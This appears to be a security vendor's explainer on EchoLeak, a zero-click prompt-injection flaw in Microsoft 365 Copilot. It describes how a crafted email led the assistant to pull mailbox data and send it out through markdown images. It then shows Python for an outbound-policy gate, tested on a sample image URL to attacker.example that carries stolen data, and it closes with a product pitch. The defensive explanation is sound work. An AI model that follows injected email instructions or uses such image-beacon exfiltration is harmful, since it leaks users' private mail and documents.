What is the EchoLeak Microsoft Copilot vulnerability?
EchoLeak (CVE-2025-32711) is a zero-click data exfiltration vulnerability in Microsoft 365 Copilot that allowed attackers to steal sensitive data simply by sending a crafted email — no user interaction required.
The EchoLeak attack chain exploited Copilot's integration with email:
- Attacker sends a specially crafted email containing hidden prompt injection instructions
- When the victim's Copilot processes emails (even in the background), it follows the injected instructions
- Copilot extracts sensitive data from the user's mailbox, calendar, or documents
- The extracted data is exfiltrated via markdown-rendered images or API calls to external servers
- The victim never clicks anything — it's completely zero-click
This is indirect prompt injection at enterprise scale. The agent (Copilot) trusted data from an external source (email) and followed malicious instructions embedded within it.
Exogram prevents EchoLeak-style attacks through outbound action governance. Every API call, every data transmission, every file operation is validated against deterministic policy rules. Even if injection succeeds at the model level, the exfiltration attempt is blocked at the execution boundary.
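One way to implement the kind of outbound gate described above, as an added example that is not Exogram's code: a deterministic policy check at the execution boundary that allowlists destinations for HTTP calls and markdown image rendering and confines file writes, run here over constructed agent output containing an injected image beacon. The allowlisted hosts and the workspace path are assumptions.

```python
from __future__ import annotations
import posixpath
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed policy: the only hosts the agent may contact, and its writable root.
ALLOWED_HOSTS = {"graph.microsoft.com", "contoso.sharepoint.com"}
WORKSPACE = "/workspace"

# Markdown image syntax ![alt](url); rendering the URL is an outbound request.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

@dataclass
class Decision:
    allowed: bool
    reason: str

def check_outbound(action: str, target: str) -> Decision:
    """Deterministic rule: no model judgement, only host/path matching."""
    if action in ("http_request", "render_image"):
        host = (urlparse(target).hostname or "").lower()   # data: URLs -> ""
        if host in ALLOWED_HOSTS:
            return Decision(True, f"{action} to allowlisted host {host!r}")
        return Decision(False, f"{action} to non-allowlisted host {host!r}")
    if action == "file_write":
        norm = posixpath.normpath(target)                  # collapses ../
        if norm == WORKSPACE or norm.startswith(WORKSPACE + "/"):
            return Decision(True, f"write inside workspace: {norm}")
        return Decision(False, f"write outside workspace: {norm}")
    return Decision(False, f"unknown action {action!r}")

def gate_model_output(text: str) -> tuple[str, list[Decision]]:
    """Replace every image whose host fails policy before the UI renders it."""
    decisions: list[Decision] = []
    def _filter(m: re.Match) -> str:
        d = check_outbound("render_image", m.group(1))
        decisions.append(d)
        return m.group(0) if d.allowed else "[image blocked by policy]"
    return MD_IMAGE.sub(_filter, text), decisions

# Constructed sample: a summary the model produced after reading an injected
# email; the image URL would carry mailbox data to an external host.
SAMPLE_OUTPUT = (
    "Summary of your inbox: 3 unread messages.\n\n"
    "![status](https://attacker.example/collect?d=Q3+forecast+attached)\n"
)

if __name__ == "__main__":
    safe, log = gate_model_output(SAMPLE_OUTPUT)
    print(safe)
    for d in log:
        print("BLOCKED" if not d.allowed else "ALLOWED", "-", d.reason)
```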
Ready to secure your AI infrastructure?
Deploy deterministic execution governance on your AI agents — 500 free API calls, no credit card.